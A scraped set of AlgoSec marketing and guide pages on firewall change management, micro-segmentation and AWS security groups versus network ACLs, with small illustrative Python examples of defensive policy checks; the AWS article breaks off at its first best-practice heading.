It reduces the risk of service disruptions that inadvertently occur when an administrator deletes or changes a rule they do not understand.” – Todd, InfoSec Architect, United States “Keep a historical change log of your firewall policy so you can return to safe harbor in case something goes wrong. A proper change log should include the reason for the change, the requester and approval records.” – Pedro Cunha, Engineer, Oni, Portugal Schedule a Demo Taking the fire drill out of firewall changes Automation is the key. It helps staff disengage from firefighting and bouncing reactively between incidents. It helps them gain control. The right automation solution can help teams track down potential traffic or connectivity issues and highlight areas of risk. Administrators can get a handle on the current status of policy compliance across mixed estates of traditional, next-generation and virtualized firewalls as well as hybrid on-prem and cloud estates. The solution can also automatically pinpoint the devices that may require changes and show how to create and implement those changes in the most secure way. Automation not only makes firewall change management easier and more predictable across large estates and multiple teams, but also frees staff to handle more strategic security and compliance tasks. Let the solution handle the heavy lifting and free up the staff for other things. To ensure a proper balance between business continuity and security, look for a firewall policy management solution that: Measures every step of the change workflow so you can easily demonstrate that SLAs are being met Identifies potential bottlenecks and risks BEFORE changes are made Pinpoints change requests that require special attention Tips from your peers Taken from The Big Collection of Firewall Management Tips “Perform reconciliation between change requests and actual performed changes. Looking at the unaccounted changes will always surprise you. 
Ensuring every change is accounted for will greatly simplify your next audit and help in day-to-day troubleshooting.” – Ron, Manager, Australia “Have a workflow process for implementing a security rule from the user requesting change, through the approval process and implementation.” – Gordy, Senior Network Engineer, United States Schedule a Demo 10 steps to automating and standardizing the firewall change-management process Here is the secret to getting network security policy change management right. Once a request is made, a change-request process should include the following steps:
1. Clarify the change request and determine the dependencies. Obtain all relevant information in the change request form (i.e., who is requesting the change and why).
2. Get proper authorization for the change, matching it to specific devices and prioritizing it. Make sure you understand the dependencies and the impact on business applications, other devices and systems, etc. This usually involves multiple stakeholders from different teams.
3. Validate that the change is necessary. AlgoSec research has found that up to 30% of changes are unnecessary. Weeding out redundant work can significantly improve IT operations and business agility.
4. Perform a risk assessment. Before approving the change, thoroughly test it and analyze the results so as not to unintentionally open up the proverbial can of worms. Does the proposed change create a new risk in the security policy? You need to know this for certain BEFORE making the change.
5. Plan the change. Assign resources, create and test your back-out plans, and schedule the change. Part of a good change plan involves having a backup plan in case a change goes unexpectedly wrong. This is also a good place in the process to ensure that everything is properly documented for troubleshooting or recertification purposes.
6. Execute the change. Back up existing configurations, prepare target device(s), notify appropriate workgroups of any planned outage, and perform the actual change.
7. Verify correct execution to avoid outages. Test the change, including affected systems and network traffic patterns.
8. Audit and govern the change process. Review the executed change and any lessons learned. Having a non-operations-related group conduct the audit provides the necessary separation of duties and ensures a documented audit trail for every change.
9. Measure SLAs. Establish new performance metrics and obtain a baseline measurement.
10. Recertify policies. While not necessary for every rule change, part of your change management process should include a review and recertification of policies at an interval that you define (e.g., once a year). Oftentimes, rules are temporary – needed only for a certain period of time – but they are left in place beyond their active date. This step forces you to review why policies are in place, enabling you to improve documentation and to remove or tweak rules to align with the business.
In some cases (e.g., a data breach), a change to a firewall rule set must be made immediately, and even with all the automation in the world, there is no time to go through the 10 steps. To address this type of situation, an emergency process should be defined and documented. Schedule a Demo Key capabilities to look for in a firewall change management solution Your workflow system must be firewall- and network-aware. This allows the system to gather the proper intelligence by pulling the configuration information from the firewalls to understand the current policies. Ultimately, this reduces the time it takes to complete many of the steps within the change process. In contrast, a general change management system will not have this integration and thus will provide no domain-specific expertise when it comes to making firewall rule changes.
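A firewall-aware workflow of this kind can be sketched in a few lines of code. The example below is illustrative only: the class, field names, and decision logic are invented for the purpose, not taken from AlgoSec's product API. It shows how a request pipeline that can query the firewalls ("is this traffic already permitted?") weeds out redundant requests before anyone touches a device.

```python
from dataclasses import dataclass, field

@dataclass
class ChangeRequest:
    """A firewall change request (hypothetical schema)."""
    requester: str
    reason: str
    src: str
    dst: str
    service: str
    status: str = "open"
    audit_trail: list = field(default_factory=list)

def process(request, already_allowed, assess_risk):
    """Walk a request through clarify -> validate -> risk-assess.

    `already_allowed` and `assess_risk` stand in for the firewall-aware
    lookups that a topology-aware workflow system would provide.
    """
    request.audit_trail.append(
        f"requested by {request.requester}: {request.reason}")
    # Validate necessity: up to 30% of requested changes are redundant
    if already_allowed(request.src, request.dst, request.service):
        request.status = "closed-unnecessary"
        request.audit_trail.append("traffic already permitted; no change needed")
        return request
    # What-if risk assessment BEFORE any device is touched
    risk = assess_risk(request.src, request.dst, request.service)
    request.status = "needs-approval" if risk == "high" else "approved-for-planning"
    request.audit_trail.append(f"risk assessed as {risk}")
    return request

# Usage: a redundant request is filtered out without touching a firewall
req = process(
    ChangeRequest("alice", "app migration", "10.0.1.5", "10.0.2.9", "tcp/443"),
    already_allowed=lambda s, d, svc: True,
    assess_risk=lambda s, d, svc: "low",
)
print(req.status)  # -> closed-unnecessary
```

Note that every decision is appended to the request's audit trail, which is what makes the reconciliation and audit steps above cheap later on.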
Your solution must support all of the firewalls and routers used within your organization. With the evolution of next-generation firewalls and new cloud devices, you should also consider how your plans fit into your firewall change-management decisions. In larger organizations, there are typically many firewalls from different vendors. If your solution cannot support all the devices in the environment (current and future), then this isn’t the solution for you! Your solution must be topology-aware. The solution must: Understand how the network is laid out. Comprehend how the devices fit and interact. Provide the necessary visibility of how traffic is flowing through the network. Your solution must integrate with the existing general change management systems. This is important so that you can maximize the return on previously made investments. You don’t want to undergo a massive retraining on processes and systems simply because you have introduced a new solution. This integration allows users to continue using their familiar systems, but with the added intelligence from having that firewall-aware visibility and understanding that the new solution delivers. Your solution must provide out-of-the-box change workflows to streamline change-management processes as well as be highly customizable, since no two organizations’ networks and change processes are exactly the same.
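To make the topology-awareness requirement above concrete, here is a minimal sketch of how a workflow system might determine which firewalls actually sit on the path a requested flow will take, so a change request only touches devices that see the traffic. The topology graph and device names are invented for illustration.

```python
from collections import deque

# Hypothetical network topology: nodes are zones and firewalls,
# edges are the links between them.
links = {
    "clients": ["fw-edge"],
    "fw-edge": ["clients", "core"],
    "core":    ["fw-edge", "fw-dc"],
    "fw-dc":   ["core", "servers"],
    "servers": ["fw-dc"],
}

def firewalls_on_path(src, dst):
    """Breadth-first search the topology and return the firewalls
    along the shortest src -> dst path (empty list if none)."""
    queue, seen = deque([[src]]), {src}
    while queue:
        path = queue.popleft()
        if path[-1] == dst:
            return [hop for hop in path if hop.startswith("fw-")]
        for nxt in links.get(path[-1], []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(path + [nxt])
    return []

print(firewalls_on_path("clients", "servers"))  # -> ['fw-edge', 'fw-dc']
```

A real product derives this graph from routing tables and device configurations rather than a hand-written dictionary, but the payoff is the same: work orders name only the devices that matter.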
Key workflow capabilities to look for in a solution: Provide out-of-the-box change workflows to help you quickly tackle common change-request scenarios Offer the ability to tailor the change process to your unique business needs by: Creating request templates that define the information required to start a change process and pre-populate information where possible Enabling parallel approval steps within the workflow — ideal when multiple approvals are required to process a change Influencing the workflow according to dynamic information obtained during ticket processing (e.g., risk level, affected firewalls, urgency) Ensuring accountability and increasing corporate governance with logic that routes change requests to specific roles throughout the workflow Identify which firewalls and rules block requested traffic Detect and filter unneeded/redundant requests for traffic that is already permitted Provide “what-if” risk-analysis to ensure compliance with regulations and policies Automatically produce detailed work orders, indicating which new or existing rules to add or edit and which objects to create or reuse Prevent unauthorized changes by automatically matching detected policy changes with request tickets and reporting on mismatches Ensure that change requests have actually been implemented on the network, preventing premature closing of tickets Schedule a Demo Out-of-the-box workflow examples The best solutions allow for: Adding new rules via a wizard-driven request process and flow that includes impact analysis, change validation and audit Changing rules and objects by easily defining the requests for creation, modification and deletion, and identifying rules affected by suggested object modifications for best impact analysis Removing rules by automatically retrieving a list of change requests related to the rule-removal request, notifying all requestors of the impending change, managing the approval process, documenting and validating removal Recertifying
rules by automatically presenting all tickets with deadlines to the responsible party for recertification or rejection and maintaining a full audit trail with actionable reporting Quantifying the ROI on firewall change-control automation Schedule a Demo Cut your costs Manual firewall change management is a time-consuming and error-prone process. Consider a typical change order that requires a total of four hours of work by several team members during the change lifecycle, including communication, validation, risk assessment, planning and design, execution, verification, documentation, auditing and measurement. Based on these assumptions, AlgoSec customers have reported significant cost savings (as much as 60%) achieved through: Reduction of 50% in processing time using automation Elimination of 30% of unnecessary changes Elimination of 8% of changes that are reopened due to incorrect implementation Schedule a Demo Summary While change management is complex stuff, the decision for your business is actually simple. You can continue to slowly chug along with manual change management processes that drain your IT resources and impede agility. Or you can accelerate your processes with an automated network change-management workflow solution that aligns the different stakeholders involved in the process (network operations, network security, compliance, business owners, etc.) and helps the business run more smoothly. Think of your change process as a key component of the engine of an expensive car (in this case, your organization). Would you drive your car at high speed if you didn’t have tested, dependable brakes or a steering wheel? Hopefully, the answer is no! The brakes and steering wheel are analogous to change controls and processes. Rather than slowing you down, they actually make you go faster, securely! Power steering and power brakes (in this case, firewall-aware integration and automation) help you zoom to success.
- Micro-segmentation from strategy to execution | AlgoSec
Implement micro-segmentation effectively, from strategy to execution, to enhance security, minimize risks, and protect critical assets across your network. Micro-segmentation from strategy to execution Overview Learn how to plan and execute your micro-segmentation project in AlgoSec’s guide. Schedule a Demo What is Micro-segmentation? Micro-segmentation is a technique to create secure zones in networks. It lets companies isolate workloads from one another and introduce tight controls over internal access to sensitive data. This makes network security more granular. Micro-segmentation is an “upgrade” to network segmentation. Companies have long relied on firewalls, VLANs, and access control lists (ACLs) to segment their networks. Network segmentation is a key defense-in-depth strategy, segregating and protecting company data and limiting attackers’ lateral movement. Consider a physical intruder who enters a gated community. Despite having breached the gate, the intruder cannot freely enter the houses in the community because, in addition to the outside gate, each house has locks on its door. Micro-segmentation takes this a step further – even if the intruder breaks into a house, the intruder cannot access all the rooms. Schedule a Demo Why Micro-segment? Organizations frequently implement micro-segmentation to block lateral movement. Two common threats that rely on lateral movement are insider threats and ransomware. Insider threats are employees or contractors gaining access to data that they are not authorized to access. Ransomware is a type of malware attack in which the attacker locks and encrypts the victim’s data and then demands a payment to unlock and decrypt it. If an attacker takes over one desktop or one server in your estate and deploys malware, you want to reduce the “blast radius” and make sure that the malware can’t spread throughout the entire data center. And if you decide not to pay the ransom?
Datto’s Global State of the Channel Ransomware Report informs us that: The cost of downtime is 23x greater than the average ransom requested in 2019. Downtime costs due to ransomware are up by 200% year-over-year. Schedule a Demo The SDN Solution With software-defined networks, such as Cisco ACI and VMware NSX, micro-segmentation can be achieved without deploying additional controls such as firewalls. Because the data center is software-driven, the fabric has built-in filtering capabilities. This means that you can introduce policy rules without adding new hardware. SDN solutions can filter flows both inside the data center (east-west traffic) and flows entering or exiting the data center (north-south traffic). The SDN technology supporting your data center eliminates many of the earlier barriers to micro-segmentation. Yet, although a software-defined fabric makes segmentation possible, there are still many challenges to making it a reality. Schedule a Demo What is a Good Filtering Policy A good filtering policy has three requirements: 1 – Allows all business traffic The last thing you want is to write a micro-segmented policy and have it break necessary business communication, causing applications to stop functioning. 2 – Allows nothing else By default, all other traffic should be denied. 3 – Future-proof “More of the same” changes in the network environment shouldn’t break rules. If you write your policies too narrowly, then any change in the network, such as a new server or application, could cause something to stop working. Write with scalability in mind. How do organizations achieve these requirements? They need to know what the traffic flows are as well as what should be allowed and what should be denied. This is difficult because most traffic is undocumented. There is no clear record of the applications in the data center and what network flows they depend on. To get accurate information, you need to perform a “discovery” process. 
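The first two requirements can be checked mechanically. Below is a toy sketch, with hypothetical rule and flow structures, of verifying that every known business flow matches an ALLOW rule while anything unmatched falls through to a default DENY (the "allows nothing else" requirement).

```python
def evaluate(flow, rules):
    """Return the action of the first rule matching (src, dst, service).

    Rules are (src, dst, service, action) tuples; "any" is a wildcard.
    Traffic matching no rule is denied by default.
    """
    for src, dst, service, action in rules:
        if (src in ("any", flow[0]) and dst in ("any", flow[1])
                and service in ("any", flow[2])):
            return action
    return "DENY"

# Hypothetical policy and discovered business flows
rules = [
    ("web-tier", "db-tier", "tcp/5432", "ALLOW"),
    ("clients", "web-tier", "https", "ALLOW"),
]
business_flows = [
    ("web-tier", "db-tier", "tcp/5432"),
    ("clients", "web-tier", "https"),
]

# Requirement 1: every business flow is allowed
assert all(evaluate(f, rules) == "ALLOW" for f in business_flows)
# Requirement 2: anything else hits the default deny
assert evaluate(("clients", "db-tier", "tcp/5432"), rules) == "DENY"
```

The third requirement, future-proofing, is about how broadly the rule terms are written (e.g., subnet ranges rather than single hosts), which the aggregation discussion later in this guide addresses.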
Schedule a Demo A Blueprint for Creating a Micro-segmentation Policy Micro-segmentation Blueprint Discovery You need to find out which traffic needs to be allowed, and then you can decide what not to allow. Two common ways to implement a discovery process are traffic-based discovery and content-based discovery. Traffic-Based Discovery Traffic-based discovery is the process of understanding traffic flows: Observe the traffic that is traversing the data center, analyze it, and identify the intent of the flows by mapping them to the applications they support. You can collect the raw traffic with a traffic sniffer/network TAP or use a NetFlow feed. Content-based or Data-Based Approach In the content-based approach, you organize the data center systems into segments based on the sensitivity of the data they process. For example, an eCommerce application may process credit card information, which is regulated by the PCI DSS standard. Therefore, you need to identify the servers supporting the eCommerce application and separate them in your filtering policy. Discovering traffic flows within a data center Micro-segmentation Blueprint Using NetFlow for Traffic Mapping The traffic source on which it is easiest to base application discovery is NetFlow. Most routers and switches can be configured to emit a NetFlow feed without requiring the deployment of agents throughout the data center. The flows in the NetFlow feed are clustered into business applications based on recurring IP addresses and correlations in time. For example, if an HTTPS connection from a client at 172.7.1.11 to 10.3.3.3 is observed at 10 AM, and a PostgreSQL connection from the same 10.3.3.3 to 10.1.1.11 is observed 0.5 seconds later, it’s clear that all three systems support a single application, which can be labeled with a name such as “Trading System”.
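A toy illustration of the clustering idea: flow records that share an IP endpoint are merged into one application group. The union-find approach and the (src, dst, service) field layout are assumptions made for the example, not a description of any vendor's algorithm; real tools also weigh timing correlations, which are omitted here.

```python
def cluster_flows(flows):
    """Group (src, dst, service) flow records into connected components
    by shared IP addresses, using a small union-find structure."""
    parent = {}

    def find(x):
        parent.setdefault(x, x)
        while parent[x] != x:
            parent[x] = parent[parent[x]]  # path halving
            x = parent[x]
        return x

    def union(a, b):
        parent[find(a)] = find(b)

    for src, dst, _service in flows:
        union(src, dst)

    groups = {}
    for flow in flows:
        groups.setdefault(find(flow[0]), []).append(flow)
    return list(groups.values())

flows = [
    ("172.7.1.11", "10.3.3.3", "HTTPS"),    # client -> web tier
    ("10.3.3.3", "10.1.1.11", "TCP/5432"),  # web tier -> database
    ("192.168.9.4", "10.9.9.9", "SSH"),     # unrelated admin session
]
apps = cluster_flows(flows)
print(len(apps))  # -> 2: the "Trading System" chain and the SSH flow
```

The first two records chain through 10.3.3.3, so they land in one group; the admin session shares no endpoint with them and forms its own group.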
[Figure: identifying traffic flows in common, based on shared IP addresses]
172.7.1.0/24 → 10.3.3.3 “TRADE SYS”, HTTPS
10.3.3.3 “TRADE SYS” → 10.1.1.11 “DB”, TCP/5432
10.3.3.7 “FOREX” → 10.1.1.11 “DB”, TCP/5432
NetFlow often produces thousands of “thin flow” records (one IP to another IP), even for a single application. In the example above, there may be a NetFlow record for every client desktop. It is important to aggregate them into “fat flows” (e.g., one flow that allows all the clients in the 172.7.1.0/24 range). In addition to avoiding an explosion in the number of flows, aggregation also provides a higher-level understanding, as well as future-proofing the policies against fluctuations in IP address allocation. Using the discovery platform in the AlgoSec Security Management Suite to identify the flows, in combination with information from your firewalls, can help you decide where to put the boundaries of your segments and which policies to put in these filters. Micro-segmentation Blueprint Defining Logical Segments Once you have discovered the business applications whose traffic is traversing the data center (using traffic-based discovery) and have also identified the data sensitivity (using a content-based approach), you are well positioned to define your segments. Bear in mind that all the traffic that is confined to a segment is allowed. Traffic crossing between segments is blocked by default – and needs to be explicitly allowed by a policy rule. There are two potential starting points: Segregate the systems processing sensitive data into their own segments. You may have to do this anyway for regulatory reasons. Segregate networks connecting to client systems (desktops, laptops, wireless networks) into “human-zone” segments. Client systems are often the entry points of malware, and are always the source of malicious insider attacks. Then, place the remaining servers supporting each application, each in its own segment.
Doing so will save you the need to write explicit policy rules to allow traffic that is internal to only one business application. Example segment within a data center Micro-segmentation Blueprint Creating the Filtering Policy Once the segments are defined, we need to write the policy. Traffic confined to a segment is automatically allowed, so we don’t need to worry about it anymore. We just need to write policy for traffic crossing micro-segment boundaries. Eventually, the last rule in the policy must be a default-deny: “from anywhere to anywhere, with any service – DENY.” However, enforcing such a rule in the early days of the micro-segmentation project, before all the rest of the policy is written, risks breaking many applications’ communications. So start with a (totally insecure) default-allow rule until your policy is ready, and then switch to a default-deny on “D-Day” (“deny-day”). We’ll discuss D-Day shortly. What types of rules are we going to be writing? Cross-segment flows – allowing traffic between segments: e.g., allow the eCommerce servers to access the credit-card Flows to/from outside the data center – e.g., allow employees in the finance department to connect to financial data within the data center from their machines in the human-zone, or allow access from the Internet to the front-end eCommerce web servers. Users outside the data center need to access data within the data center Micro-segmentation Blueprint Default Allow – with Logging To avoid major connectivity disruptions, start your micro-segmentation project gently. Instead of writing a “DENY” rule at the end of the policy, write an “ALLOW” rule – which is clearly insecure – but turn on logging for this ALLOW rule. This creates a log of all connections that match the default-allow rule. Initially you will receive many log entries from the default-allow rule; your goal in the project is to eliminate them.
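This tightening loop can be simulated in a few lines. The flow tuples and the helper below are hypothetical; the point is that each application rule you add shrinks the default-allow log until it goes quiet.

```python
def unmatched(traffic, rules):
    """Flows that match no explicit rule and would therefore hit
    (and be logged by) the default-allow catch-all."""
    return [f for f in traffic if f not in rules]

# Flows observed hitting the logged default-allow rule (invented names)
observed = {
    ("crm", "db", "tcp/5432"),
    ("crm", "mail", "smtp"),
    ("hr", "files", "smb"),
}
explicit_rules = set()

# Iteration 1: no explicit rules yet, so every flow is logged
assert len(unmatched(observed, explicit_rules)) == 3

# Add rules application by application; the default-allow log shrinks
explicit_rules |= {("crm", "db", "tcp/5432"), ("crm", "mail", "smtp")}
assert len(unmatched(observed, explicit_rules)) == 1

explicit_rules.add(("hr", "files", "smb"))
assert unmatched(observed, explicit_rules) == []  # quiet: ready for D-Day
```

When the catch-all stops logging new flows, flipping it from ALLOW to DENY no longer risks breaking the applications you have already covered.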
To do this, you go over the applications you discovered earlier, write the policy rules that support each application’s cross-segment flows, and place them above the default-allow rule. This means that the traffic of each application you handle will no longer match the default-allow (it will match the new rules you wrote) – and the amount of default-allow logs will decrease. Keep adding rules, application by application, until the final allow rule is not generating any more logs. At that point, you reach the final milestone in the project: D-Day. Micro-segmentation Blueprint Preparing for “D-Day” Once logging generated by the default-allow rule ceases to indicate new flows that need to be added to your filtering policy, you can start preparing for “D-Day.” This is the day that you flip the switch and change the final rule from “default ALLOW” to “default DENY.” Once you do that, all the undiscovered traffic is going to be denied by the filtering fabric, and you will finally have a secured, micro-segmented, data center. This is a big deal! However, you should realize that D-Day is going to cause a big organizational change. From this day forward, every application developer whose application requires new traffic to cross the data center will need to ask for permission to allow this traffic; they will need to follow a process, which includes opening a change request, and then wait for the change to be implemented. The free-wheeling days are over. You need to prepare for D-Day. Consider steps such as: Get management buy-in Communicate the change across the organization Set a change control window Have “all hands on deck” on D-Day to quickly correct anything that may have been missed and causes applications to break Micro-segmentation Blueprint Change Requests & Compliance Notice that after D-Day, any change in application connectivity requires filing a “change request”. 
When the information security team is evaluating a change request, they need to check whether the request is in line with the “acceptable traffic” policy. A common method for managing policy at the high level is to use a table, where each row and each column represents a segment. Each cell in the table lists all the services that are allowed from its “row” segment to its “column” segment. Keeping this table in a machine-readable format, such as an Excel spreadsheet, enables software systems to run a what-if risk-check that compares each change request with the acceptable policy, and flags any discrepancies before the new rules are deployed. Such a what-if risk-check is also important for regulatory compliance. Regulations such as PCI DSS and ISO 27001 require organizations to define such a policy and to compare themselves to it; demonstrating the policy is often part of the certification or audit. Schedule a Demo Enabling Micro-segmentation with AlgoSec The AlgoSec Security Management Suite (ASMS) makes it easy to define and enforce your micro-segmentation strategy inside the data center, ensuring that it does not block critical business services and does meet compliance requirements. AlgoSec’s powerful AutoDiscovery capabilities help you understand the network flows in your organization. You can automatically connect the recognized traffic flows to the business applications that use them. Once the segments are established, AlgoSec seamlessly manages the network security policy across your entire hybrid network estate. AlgoSec proactively checks every proposed firewall rule change request against the segmentation strategy to ensure that the change doesn’t break the segmentation strategy, introduce risk, or violate compliance requirements.
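The segment-to-segment table described above is easy to query once it is machine-readable. Here is a toy sketch, with invented segment names, of a what-if check against such a matrix; a real system would load the matrix from the spreadsheet rather than hard-code it.

```python
# matrix[row][col] lists the services allowed from segment `row`
# to segment `col`, mirroring the spreadsheet layout described above.
matrix = {
    "human-zone": {"web-tier": {"https"}, "db-tier": set()},
    "web-tier":   {"human-zone": set(), "db-tier": {"tcp/5432"}},
    "db-tier":    {"human-zone": set(), "web-tier": set()},
}

def what_if(src_segment, dst_segment, service):
    """Flag a change request that the acceptable-traffic policy forbids,
    before any rule reaches a device."""
    allowed = matrix.get(src_segment, {}).get(dst_segment, set())
    return "ok" if service in allowed else "violation: escalate to infosec"

print(what_if("human-zone", "web-tier", "https"))    # -> ok
print(what_if("human-zone", "db-tier", "tcp/5432"))  # -> violation: escalate to infosec
```

Because the check runs against the policy rather than the devices, a flagged request can be rejected or escalated before implementation, which is exactly the evidence auditors ask for.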
AlgoSec enforces micro-segmentation by:
- Generating a custom report on compliance enforced by the micro-segmentation policy
- Identifying unprotected network flows that do not cross any firewall and are not filtered for an application
- Automatically identifying changes that violate the micro-segmentation strategy
- Automatically implementing network security changes
- Automatically validating changes

Security zones in AlgoSec's AppViz

About AlgoSec

AlgoSec, a global cybersecurity leader, empowers organizations to secure application connectivity by automating connectivity flows and security policy, anywhere. The AlgoSec platform enables the world's most complex organizations to gain visibility, reduce risk and process changes at zero-touch across the hybrid network. AlgoSec's patented application-centric view of the hybrid network enables business owners, application owners, and information security professionals to talk the same language, so organizations can deliver business applications faster while achieving a heightened security posture. Over 1,800 of the world's leading organizations trust AlgoSec to help secure their most critical workloads across public cloud, private cloud, containers, and on-premises networks, while taking advantage of almost two decades of leadership in Network Security Policy Management. See what securely accelerating your digital transformation, move-to-cloud, infrastructure modernization, or micro-segmentation initiatives looks like at www.algosec.com

Want to learn more about how AlgoSec can help enable micro-segmentation? Schedule a demo.
- AlgoSec application discovery Enhance the discovery of your network applications | AlgoSec
Streamline network management with AlgoSec Application Discovery. Gain visibility into application connectivity to optimize performance and enhance security policies.
- Master the Zero Trust strategy for improved cybersecurity | AlgoSec
Webinars: Master the Zero Trust strategy for improved cybersecurity — Learn how to implement zero trust security into your business

In today's digital world, cyber threats are becoming more complex and sophisticated. Businesses must adopt a proactive approach to cybersecurity to protect their sensitive data and systems. This is where zero trust security comes in – a security model that requires every user, device, and application to be verified before granting access. If you're looking to implement zero trust security in your business or want to know more about how it works, you'll want to watch this webinar. AlgoSec Co-Founder and CTO Avishai Wool will discuss the benefits of zero trust security and provide you with practical tips on how to implement this security model in your organization. March 15, 2023 — Prof. Avishai Wool, CTO & Co-Founder, AlgoSec

Relevant resources:
- Protecting Your Network's Precious Jewels with Micro-Segmentation, Kyle Wickert, AlgoSec (video)
- Professor Wool – Introduction to Microsegmentation (video)
- Five Practical Steps to Implementing a Zero-Trust Network
- AlgoSec | NACL best practices: How to combine security groups with network ACLs effectively
AWS NACL best practices: How to combine security groups with network ACLs effectively
Prof. Avishai Wool · 2 min read · Published 8/28/23

Like all modern cloud providers, Amazon adopts the shared responsibility model for cloud security. Amazon guarantees secure infrastructure for Amazon Web Services, while AWS users are responsible for maintaining secure configurations. That requires using multiple AWS services and tools to manage traffic. You'll need to develop a set of inbound rules for incoming connections between your Amazon Virtual Private Cloud (VPC) and all of its Elastic Compute Cloud (EC2) instances and the rest of the Internet. You'll also need to manage outbound traffic with a series of outbound rules. Your Amazon VPC provides you with several tools to do this. The two most important ones are security groups and Network Access Control Lists (NACLs). Security groups are stateful firewalls that secure inbound and outbound traffic for individual EC2 instances. Network ACLs are stateless firewalls that secure inbound and outbound traffic for VPC subnets. Managing AWS VPC security requires configuring both of these tools appropriately for your unique security risk profile. This means planning your security architecture carefully to align it with the rest of your security framework. For example, your firewall rules impact the way AWS Identity and Access Management (IAM) handles user permissions. Some (but not all) IAM features can be implemented at the network firewall layer of security. Before you can manage AWS network security effectively, you must familiarize yourself with how AWS security tools work and what sets them apart.
Everything you need to know about security groups vs NACLs

AWS security groups explained: Every AWS account has a single default security group assigned to the default VPC in every Region. It is configured to allow inbound traffic from network interfaces assigned to the same group, using any protocol and any port. It also allows all outbound traffic using any protocol and any port. Your default security group will also allow all outbound IPv6 traffic once your VPC is associated with an IPv6 CIDR block. You can't delete the default security group, but you can create new security groups and assign them to AWS EC2 instances. By default, each security group can contain up to 60 inbound and 60 outbound rules, and you can create up to 2,500 security groups per Region. You can associate many different security groups with a single instance, potentially combining hundreds of rules. These are all allow rules that permit traffic to flow according to the ports and protocols specified. For example, you might set up a rule that authorizes inbound traffic over IPv6 for Linux SSH commands and sends it to a specific destination. This could be different from the destination you set for other TCP traffic. Security groups are stateful, which means that requests sent from your instance will be allowed to flow regardless of inbound traffic rules. Similarly, VPC security groups automatically allow responses to inbound traffic to flow out regardless of outbound rules. However, since security groups do not support deny rules, you can't use them to block a specific IP address from connecting to your EC2 instance. Be aware that Amazon EC2 automatically blocks email traffic on port 25 by default – but this is not included as a specific rule in your default security group.

AWS NACLs explained: Your VPC comes with a default NACL configured to automatically allow all inbound and outbound network traffic. Unlike security groups, NACLs filter traffic at the subnet level.
That means that Network ACL rules apply to every EC2 instance in the subnet, allowing users to manage AWS resources more efficiently. Every subnet in your VPC must be associated with a Network ACL. Any single Network ACL can be associated with multiple subnets, but each subnet can only be assigned to one Network ACL at a time. Every rule has its own rule number, and Amazon evaluates rules in ascending order. The most important characteristic of NACL rules is that they can deny traffic. Amazon evaluates these rules when traffic enters or leaves the subnet – not while it moves within the subnet. You can access more granular data on traffic flows using VPC flow logs. Since Amazon evaluates NACL rules in ascending order, make sure that you place deny rules earlier in the table than rules that allow traffic to multiple ports. You will also have to create specific rules for IPv4 and IPv6 traffic – AWS treats these as two distinct types of traffic, so rules that apply to one do not automatically apply to the other. Once you start customizing NACLs, you will have to take into account the way they interact with other AWS services. For example, Elastic Load Balancing won't work if your NACL contains a deny rule excluding traffic from 0.0.0.0/0 or the subnet's CIDR. You should create specific inclusions for services like Elastic Load Balancing, AWS Lambda, and Amazon CloudWatch. You may need to set up specific inclusions for third-party APIs as well. You can create these inclusions by specifying the ephemeral port ranges that correspond to the services you want to allow. For example, NAT gateways use ports 1024 to 65535. This is the same range covered by AWS Lambda functions, but it is different from the range used by Windows operating systems. When creating these rules, remember that unlike security groups, NACLs are stateless. That means that when responses to allowed traffic are generated, those responses are subject to NACL rules.
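The ascending, first-match evaluation described above is why rule order matters so much in NACLs. A minimal sketch, with hypothetical rule numbers and CIDRs, and simplified exact/any matching:

```python
# NACL evaluation in miniature: rules are checked in ascending
# rule-number order and the first match wins, which is why a deny
# placed after a broad allow never fires. Rule numbers and CIDRs
# below are hypothetical.

NACL_INBOUND = [
    (90,  "deny",  "198.51.100.0/24"),  # known-bad range, placed first
    (100, "allow", "0.0.0.0/0"),        # broad allow
]

def nacl_verdict(source_cidr):
    for _number, action, cidr in sorted(NACL_INBOUND):
        if cidr in (source_cidr, "0.0.0.0/0"):
            return action
    return "deny"  # implicit deny if nothing matches

print(nacl_verdict("198.51.100.0/24"))  # deny  - rule 90 matches first
print(nacl_verdict("203.0.113.0/24"))   # allow - falls through to rule 100
```

Swap the rule numbers so the broad allow becomes rule 90 and the deny never takes effect: same rules, opposite policy.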
Misconfigured NACLs deny traffic responses that should be allowed, leading to errors, reduced visibility, and potential security vulnerabilities.

How to configure and map NACL associations

A major part of optimizing NACL architecture involves mapping the associations between security groups and NACLs. Ideally, you want to enforce a specific set of rules at the subnet level using NACLs, and a different set of instance-specific rules at the security group level. Keeping these rulesets separate will prevent you from setting inconsistent rules and accidentally causing unpredictable performance problems. The first step in mapping NACL associations is using the Amazon VPC console to find out which NACL is associated with a particular subnet. Since NACLs can be associated with multiple subnets, you will want to create a comprehensive list of every association and the rules they contain.

To find out which NACL is associated with a subnet:
1. Open the Amazon VPC console.
2. Select Subnets in the navigation pane.
3. Select the subnet you want to inspect. The Network ACL tab will display the ID of the ACL associated with that subnet, and the rules it contains.

To find out which subnets are associated with a NACL:
1. Open the Amazon VPC console.
2. Select Network ACLs in the navigation pane.
3. Check the column entitled Associated With.
4. Select a Network ACL from the list.
5. Look for Subnet associations in the details pane and click on it. The pane will show you all subnets associated with the selected Network ACL.

Now that you know the difference between security groups and NACLs and can map the associations between your subnets and NACLs, you're ready to implement some security best practices that will help you strengthen and simplify your network architecture.
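The console steps above can also be scripted. As a sketch, the snippet below builds a subnet-to-NACL map from data shaped like the output of `aws ec2 describe-network-acls`; the IDs are hypothetical, and only the response fields used here are shown:

```python
# Build a subnet -> NACL map from describe-network-acls-shaped data,
# and flag subnets still inheriting the default NACL.
# NACL and subnet IDs below are hypothetical.

nacls = [
    {"NetworkAclId": "acl-0a1b", "IsDefault": True,
     "Associations": [{"SubnetId": "subnet-111"}, {"SubnetId": "subnet-222"}]},
    {"NetworkAclId": "acl-9z8y", "IsDefault": False,
     "Associations": [{"SubnetId": "subnet-333"}]},
]

subnet_to_nacl = {
    assoc["SubnetId"]: acl["NetworkAclId"]
    for acl in nacls for assoc in acl["Associations"]
}

# Subnets on the default (allow-all) NACL deserve a closer look:
on_default = [assoc["SubnetId"] for acl in nacls if acl["IsDefault"]
              for assoc in acl["Associations"]]

print(subnet_to_nacl["subnet-333"])  # acl-9z8y
print(on_default)                    # ['subnet-111', 'subnet-222']
```

Re-running this map after every change gives you the comprehensive association list the text recommends, without clicking through the console each time.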
5 best practices for AWS NACL management

Pay close attention to default NACLs, especially at the beginning

